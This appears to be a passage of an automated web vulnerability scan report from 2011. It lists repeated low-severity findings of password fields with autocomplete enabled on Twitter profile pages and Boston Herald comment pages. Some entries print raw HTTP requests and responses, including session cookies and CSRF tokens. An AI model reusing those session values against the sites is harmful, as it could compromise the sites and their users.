Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.96. http://twitter.com/ericmmartin previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ericmmartin

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /ericmmartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.97. http://twitter.com/gercheq previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/gercheq

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.98. http://twitter.com/harvardlampoon previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/harvardlampoon

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265997-31045-3388
ETag: "dd05aa33a38e41399f97d64b699efc32"
Last-Modified: Sat, 29 Jan 2011 01:53:17 GMT
X-Runtime: 0.01350
Content-Type: text/html; charset=utf-8
Content-Length: 19877
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.99. http://twitter.com/j_hollender previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/j_hollender

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.100. http://twitter.com/jayleno previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/jayleno

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.101. http://twitter.com/jbchang previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/jbchang

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.102. http://twitter.com/joedwinell/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/joedwinell/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.103. http://twitter.com/joemccann previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/joemccann

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /joemccann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.104. http://twitter.com/jordanknight previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/jordanknight

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.105. http://twitter.com/kennychesney previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/kennychesney

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.106. http://twitter.com/kfaulk33 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/kfaulk33

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.107. http://twitter.com/lapubell previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/lapubell

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.108. http://twitter.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.109. http://twitter.com/malsup previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.110. http://twitter.com/malsup/favorites previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/favorites

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /malsup/favorites HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.111. http://twitter.com/malsup/lists/memberships previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/lists/memberships

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224909-80319-15886
ETag: "c8e3bcf74656418e1966d131ca1712ec"
Last-Modified: Fri, 28 Jan 2011 14:28:29 GMT
X-Runtime: 0.29750
Content-Type: text/html; charset=utf-8
Content-Length: 53194
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOTY3NDUzZWYzNmZkNjRmZmZhNWVmMDJlMjczNTIz%250AYWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d2b7d333c4ae3616cea1972ad8fcfbf90f4504; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="a38f8495714acb2295d777e7c73336f7b8a83544" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.112. http://twitter.com/mariamenounos previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/mariamenounos

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.113. http://twitter.com/mattbanks previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/mattbanks

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.114. http://twitter.com/mennovanslooten previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/mennovanslooten

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /mennovanslooten HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.115. http://twitter.com/messengerpost previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/messengerpost

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /messengerpost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.116. http://twitter.com/miketaylr previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/miketaylr

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /miketaylr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.117. http://twitter.com/moxiesoft previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/moxiesoft

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /moxiesoft HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.118. http://twitter.com/onlyjazz previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/onlyjazz

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /onlyjazz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.119. http://twitter.com/oschina previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/oschina

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.120. http://twitter.com/rachbarnhart previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/rachbarnhart

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.121. http://twitter.com/rem previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/rem

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.122. http://twitter.com/rickrussie previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/rickrussie

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /rickrussie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.123. http://twitter.com/roctimo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/roctimo

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /roctimo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.124. http://twitter.com/rwaldron previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/rwaldron

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.125. http://twitter.com/ryanolson previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ryanolson

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.126. http://twitter.com/scott_gonzalez previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/scott_gonzalez

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.127. http://twitter.com/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.128. http://twitter.com/sentience previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/sentience

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.129. http://twitter.com/simplemodal previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/simplemodal

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.130. http://twitter.com/sitepointdotcom previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/sitepointdotcom

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.131. http://twitter.com/slaterusa previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/slaterusa

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /slaterusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.132. http://twitter.com/stubbornella previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/stubbornella

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.133. http://twitter.com/thehomeorg previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/thehomeorg

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.134. http://twitter.com/townsandtrails previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/townsandtrails

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /townsandtrails HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.135. http://twitter.com/travis previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/travis

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /travis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.136. http://twitter.com/tylerseguin92 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/tylerseguin92

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.137. http://twitter.com/waynecountylife previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/waynecountylife

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /waynecountylife HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.138. http://twitter.com/webandy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/webandy

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.139. http://twitter.com/zonajones previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/zonajones

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.140. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.141. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.142. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.143. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

12.144. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL:

http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

